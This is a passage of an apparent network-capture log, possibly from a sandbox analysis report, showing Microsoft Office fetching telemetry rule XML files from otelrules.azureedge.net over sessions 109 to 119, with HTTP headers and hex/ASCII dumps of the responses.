2024-11-05 17:46:16 UTC	192	OUT	GET /rules/rule702800v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:16 UTC	538	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:16 GMT Content-Type: text/xml Content-Length: 1354 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE0662D7C" x-ms-request-id: 1deec605-401e-0029-2fd2-2c9b43000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174616Z-16547b76f7fp46ndhC1DFW66zg00000005k0000000008r3s x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:16 UTC	1354	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O

Session ID	Source IP	Source Port	Destination IP	Destination Port
109	192.168.2.4	49849	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:16 UTC	192	OUT	GET /rules/rule703351v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:16 UTC	515	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:16 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT ETag: "0x8DC582BDCDD6400" x-ms-request-id: 62e0c468-a01e-0084-1b55-2e9ccd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174616Z-15869dbbcc6rzfwxhC1DFWrkb000000000n0000000002916 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-05 17:46:16 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
110	192.168.2.4	49850	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:16 UTC	192	OUT	GET /rules/rule703350v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:17 UTC	494	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:17 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT ETag: "0x8DC582BDF1E2608" x-ms-request-id: a6457f9b-d01e-0014-585c-2eed58000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174617Z-15869dbbcc6j87jfhC1DFWky3s00000005mg0000000075kk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:17 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
111	192.168.2.4	49852	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:17 UTC	192	OUT	GET /rules/rule703501v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:17 UTC	538	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:17 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT ETag: "0x8DC582BE8C605FF" x-ms-request-id: 5b14ddc3-301e-0033-2bd2-2cfa9c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174617Z-16547b76f7fr4g8xhC1DFW9cqc00000004rg000000003d6k x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:17 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa

Session ID	Source IP	Source Port	Destination IP	Destination Port
112	192.168.2.4	49853	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:17 UTC	192	OUT	GET /rules/rule703500v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:17 UTC	538	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:17 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF497570" x-ms-request-id: 9890a075-d01e-002b-06d2-2c25fb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174617Z-16547b76f7f7scqbhC1DFW0m5w00000005dg000000000r15 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:17 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
113	192.168.2.4	49854	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:17 UTC	192	OUT	GET /rules/rule701801v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:17 UTC	494	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:17 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDC2EEE03" x-ms-request-id: 9acac97d-a01e-0084-3378-2e9ccd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174617Z-15869dbbcc6xcpf8hC1DFWxtx000000005f00000000094zb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:17 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
114	192.168.2.4	49856	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:17 UTC	192	OUT	GET /rules/rule701051v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:18 UTC	515	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:17 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT ETag: "0x8DC582BE1CC18CD" x-ms-request-id: a7d47cd0-801e-0067-0c8e-2dfe30000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174617Z-15869dbbcc6rzfwxhC1DFWrkb000000000dg000000005c88 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:18 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe

Session ID	Source IP	Source Port	Destination IP	Destination Port
115	192.168.2.4	49855	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:17 UTC	192	OUT	GET /rules/rule701800v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:18 UTC	494	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:18 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT ETag: "0x8DC582BEA414B16" x-ms-request-id: fa0844ee-c01e-0082-40fb-2eaf72000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174618Z-17df447cdb57srlrhC1DFWwgas00000001p000000000u29g x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:18 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
116	192.168.2.4	49857	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:18 UTC	192	OUT	GET /rules/rule701050v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:18 UTC	538	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:18 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB256F43" x-ms-request-id: fadf1528-a01e-001e-72d2-2c49ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174618Z-16547b76f7fnm7lfhC1DFWkxt400000005b000000000m15u x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:18 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
117	192.168.2.4	49858	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:18 UTC	192	OUT	GET /rules/rule702751v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:18 UTC	494	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:18 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB866CDB" x-ms-request-id: 0b0dd1c9-501e-0016-2958-2e181b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174618Z-17df447cdb56j5xmhC1DFWn91800000001r0000000008tcn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:18 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
118	192.168.2.4	49859	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:18 UTC	192	OUT	GET /rules/rule702750v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:18 UTC	494	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:18 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT ETag: "0x8DC582BE5B7B174" x-ms-request-id: 512decfe-801e-0083-3058-2ef0ae000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174618Z-17df447cdb5qkskwhC1DFWeeg400000001pg00000000dkf8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:18 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
119	192.168.2.4	49860	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:18 UTC	192	OUT	GET /rules/rule702301v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:19 UTC	538	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:18 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT ETag: "0x8DC582BE976026E" x-ms-request-id: 898deafb-901e-0048-35d2-2cb800000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174618Z-16547b76f7fdf69shC1DFWcpd000000005e0000000007rhy x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
